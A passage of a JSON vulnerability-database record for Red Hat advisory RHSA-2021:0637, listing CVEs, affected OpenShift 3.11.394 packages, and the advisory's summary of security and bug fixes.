"AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://access.redhat.com/errata/RHSA-2021:0637", "reporter": "RedHat", "references": [], "cvelist": ["CVE-2020-11979", "CVE-2020-1945", "CVE-2020-2304", "CVE-2020-2305", "CVE-2020-2306", "CVE-2020-2307", "CVE-2020-2308", "CVE-2020-2309", "CVE-2020-25658", "CVE-2021-21602", "CVE-2021-21603", "CVE-2021-21604", "CVE-2021-21605", "CVE-2021-21606", "CVE-2021-21607", "CVE-2021-21608", "CVE-2021-21609", "CVE-2021-21610", "CVE-2021-21611"], "immutableFields": [], "lastseen": "2021-03-30T16:28:09", "history": [], "viewCount": 57, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "REDHAT-RHSA-2021-0637.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL", "REDHAT-RHSA-2021-0423.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0429.NASL", "REDHAT-RHSA-2021-0038.NASL", "EULEROS_SA-2021-1133.NASL", "REDHAT-RHSA-2021-0034.NASL", "FEDORA_2020-2640AA4E19.NASL"]}, {"type": "archlinux", "idList": ["ASA-202012-5", "ASA-202101-41", "ASA-202005-15"]}, {"type": "redhat", "idList": ["RHSA-2021:0719", "RHSA-2021:0038", "RHSA-2021:0282", "RHSA-2020:2618", "RHSA-2021:0037", "RHSA-2021:0429", "RHSA-2021:0034", "RHSA-2021:0039", "RHSA-2021:0423"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-21608", "RH:CVE-2020-11979", "RH:CVE-2021-21611", "RH:CVE-2021-21610", "RH:CVE-2021-21607", "RH:CVE-2021-21603", "RH:CVE-2021-21605", "RH:CVE-2021-21606", "RH:CVE-2021-21602", "RH:CVE-2021-21609"]}, {"type": "cve", "idList": ["CVE-2021-21602", "CVE-2021-21606", "CVE-2021-21609", "CVE-2021-21604", "CVE-2021-21610", "CVE-2021-21603", "CVE-2021-21608", "CVE-2021-21611", "CVE-2021-21607", "CVE-2021-21605"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-25658", "UB:CVE-2020-11979", "UB:CVE-2020-1945"]}, {"type": "github", "idList": ["GHSA-4P6W-M9WC-C9C9", "GHSA-XRX6-FMXQ-RJJ2", "GHSA-F62V-XPXF-3V68"]}, {"type": "fedora", "idList": ["FEDORA:146FE30DD5E7", "FEDORA:2D51F60C28B2", "FEDORA:88EAA30905CF", "FEDORA:52396606732B", "FEDORA:6869030D3139"]}, {"type": "gentoo", "idList": ["GLSA-202011-18", "GLSA-202007-34"]}, {"type": "ubuntu", "idList": ["USN-4380-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877939", "OPENVAS:1361412562310877930", "OPENVAS:1361412562310844454"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1022-1"]}, {"type": "freebsd", "idList": ["6D5F1B0B-B865-48D5-935B-3FB6EBB425FC"]}], "modified": "2021-03-30T16:28:09", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-03-30T16:28:09", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-kuryr-cni", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-cni-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-enterprise-service-catalog-svcat", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "openshift-enterprise-cluster-capacity", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-pod", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-web-console", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-enterprise-service-catalog-svcat", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-svcat-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-node", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-tests", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-dockerregistry", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "golang-github-openshift-oauth-proxy", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-descheduler", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "openshift-enterprise-autoheal", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-enterprise-autoheal", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-template-service-broker", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-master", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "prometheus-node-exporter", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-web-console", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-ansible", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-dockerregistry", "packageVersion": "3.11.394-1.git.481.6e48246.el7", "packageFilename": "atomic-openshift-dockerregistry-3.11.394-1.git.481.6e48246.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-hyperkube", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "prometheus-alertmanager", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "prometheus", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-openshift-oauth-proxy", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "prometheus", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "prometheus-3.11.394-1.git.5026.2c9627f.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "haproxy", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-1.8.28-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "jenkins", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "atomic-openshift-docker-excluder", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-docker-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-web-console", "packageVersion": "3.11.394-1.git.667.08dd2a6.el7", "packageFilename": "atomic-openshift-web-console-3.11.394-1.git.667.08dd2a6.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "prometheus-node-exporter", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "prometheus-node-exporter-3.11.394-1.git.1062.8adc4b8.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "prometheus-alertmanager", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-service-idler", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "python-rsa", "packageVersion": "4.5-3.el7", "packageFilename": "python-rsa-4.5-3.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-metrics-server", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-roles", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-roles-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-kuryr", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-3.11.394-1.git.1490.16ed375.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-clients", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-metrics-server", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-enterprise-service-catalog", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-sdn-ovs", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-node-problem-detector", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-enterprise-service-catalog", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-hyperkube", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hyperkube-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-template-service-broker", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-template-service-broker-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-enterprise-service-catalog", "packageVersion": "3.11.394-1.git.1675.fdb6e0b.el7", "packageFilename": "atomic-enterprise-service-catalog-3.11.394-1.git.1675.fdb6e0b.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "golang-github-openshift-oauth-proxy", "packageVersion": "3.11.394-1.git.439.4c37707.el7", "packageFilename": "golang-github-openshift-oauth-proxy-3.11.394-1.git.439.4c37707.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-hypershift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-3.11.394-1.git.0.e03a88e.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-pod", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-pod-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "haproxy-debuginfo", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "python2-kuryr-kubernetes", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "python2-kuryr-kubernetes-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "jenkins-2-plugins", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "python2-rsa", "packageVersion": "4.5-3.el7", "packageFilename": "python2-rsa-4.5-3.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-prometheus-node_exporter", "packageVersion": "3.11.394-1.git.1062.8adc4b8.el7", "packageFilename": "golang-github-prometheus-node_exporter-3.11.394-1.git.1062.8adc4b8.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-cluster-autoscaler", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-service-idler", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-enterprise-cluster-capacity", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-prometheus-prometheus", "packageVersion": "3.11.394-1.git.5026.2c9627f.el7", "packageFilename": "golang-github-prometheus-prometheus-3.11.394-1.git.5026.2c9627f.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-tests", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-tests-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-clients", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-kuryr-controller", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-controller-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-service-idler", "packageVersion": "3.11.394-1.git.15.73f73cd.el7", "packageFilename": "atomic-openshift-service-idler-3.11.394-1.git.15.73f73cd.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "haproxy18", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "jenkins-2-plugins", "packageVersion": "3.11.1612862361-1.el7", "packageFilename": "jenkins-2-plugins-3.11.1612862361-1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-cluster-autoscaler", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "openshift-enterprise-autoheal", "packageVersion": "3.11.394-1.git.218.59eb597.el7", "packageFilename": "openshift-enterprise-autoheal-3.11.394-1.git.218.59eb597.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-test", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-test-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-kuryr-common", "packageVersion": "3.11.394-1.git.1490.16ed375.el7", "packageFilename": "openshift-kuryr-common-3.11.394-1.git.1490.16ed375.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-node-problem-detector", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-master", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-master-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-cluster-autoscaler", "packageVersion": "3.11.394-1.git.0.1900c76.el7", "packageFilename": "atomic-openshift-cluster-autoscaler-3.11.394-1.git.0.1900c76.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-docs", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-docs-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-sdn-ovs", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-sdn-ovs-3.11.394-1.git.0.e03a88e.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "atomic-openshift-metrics-server", "packageVersion": "3.11.394-1.git.53.3d82586.el7", "packageFilename": "atomic-openshift-metrics-server-3.11.394-1.git.53.3d82586.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "golang-github-prometheus-alertmanager", "packageVersion": "3.11.394-1.git.0.1fbb64c.el7", "packageFilename": "golang-github-prometheus-alertmanager-3.11.394-1.git.0.1fbb64c.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "openshift-enterprise-cluster-capacity", "packageVersion": "3.11.394-1.git.379.92adfdc.el7", "packageFilename": "openshift-enterprise-cluster-capacity-3.11.394-1.git.379.92adfdc.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "haproxy18", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy18-1.8.28-1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "atomic-openshift-excluder", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-excluder-3.11.394-1.git.0.e03a88e.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "atomic-openshift-descheduler", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "src", "packageName": "jenkins", "packageVersion": "2.263.3.1612433584-1.el7", "packageFilename": "jenkins-2.263.3.1612433584-1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-node", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-node-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-hypershift", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-hypershift-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-node-problem-detector", "packageVersion": "3.11.394-1.git.263.49acf3a.el7", "packageFilename": "atomic-openshift-node-problem-detector-3.11.394-1.git.263.49acf3a.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-descheduler", "packageVersion": "3.11.394-1.git.299.ad3a3c0.el7", "packageFilename": "atomic-openshift-descheduler-3.11.394-1.git.299.ad3a3c0.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "x86_64", "packageName": "atomic-openshift-clients-redistributable", "packageVersion": "3.11.394-1.git.0.e03a88e.el7", "packageFilename": "atomic-openshift-clients-redistributable-3.11.394-1.git.0.e03a88e.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "noarch", "packageName": "openshift-ansible-playbooks", "packageVersion": "3.11.394-6.git.0.47ec25d.el7", "packageFilename": "openshift-ansible-playbooks-3.11.394-6.git.0.47ec25d.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "arch": "ppc64le", "packageName": "haproxy-debuginfo", "packageVersion": "1.8.28-1.el7", "packageFilename": "haproxy-debuginfo-1.8.28-1.el7.ppc64le.rpm", "operator": "lt"}], "vendorCvss": {}}, "lastseen": "2021-03-30T16:28:09", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "RHSA-2021:0637", "hash": "5c21f123c230047f1e33ea67a3bcbd72", "type": "redhat", "bulletinFamily": "unix", "title": "(RHSA-2021:0637) Important: OpenShift Container Platform 3.11.394 bug fix and security update", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* jenkins-2-plugins/subversion: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2304)\n\n* jenkins-2-plugins/mercurial: XML parser is not preventing XML external entity (XXE) attacks (CVE-2020-2305)\n\n* ant: Insecure temporary file vulnerability (CVE-2020-1945)\n\n* jenkins-2-plugins/mercurial: Missing permission check in an HTTP endpoint could result in information disclosure (CVE-2020-2306)\n\n* jenkins-2-plugins/kubernetes: Jenkins controller environment variables are accessible in Kubernetes plug-in (CVE-2020-2307)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes Plugin allows listing pod templates (CVE-2020-2308)\n\n* jenkins-2-plugins/kubernetes: Missing permission check in Kubernetes plug-in allows enumerating credentials IDs (CVE-2020-2309)\n\n* ant: Insecure temporary file (CVE-2020-11979)\n\n* python-rsa: Bleichenbacher timing oracle attack against RSA decryption (CVE-2020-25658)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\n\nThis advisory contains the RPM packages for Red Hat OpenShift Container\nPlatform 3.11.394. See the following advisory for the container images for this release:\n\nhttps://access.redhat.com/errata/RHBA-2021:0638\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/3.11/release_notes/ocp_3_11_release_notes.html\n\nThis update fixes the following bugs among others:\n\n* Previously, the restart-cluster playbook did not evaluate the defined cluster size for ops clusters. This was causing come clusters to never complete their restart. This bug fix passes the logging ops cluster size, allowing restarts of ops clusters to complete successfully. (BZ#1879407)\n\n* Previously, the `openshift_named_certificates` role checked the contents of the `ca-bundle.crt` file during cluster installation. This caused the check to fail during initial installation because the `ca-bundle.crt` file is not yet created in that scenario. This bug fix allows the cluster to skip checking the `ca-bundle.crt` file if it does not exist, resulting in initial installations succeeding. (BZ#1920567)\n\n* Previously, if the `openshift_release` attribute was not set in the Ansible inventory file, the nodes of the cluster would fail during an upgrade. 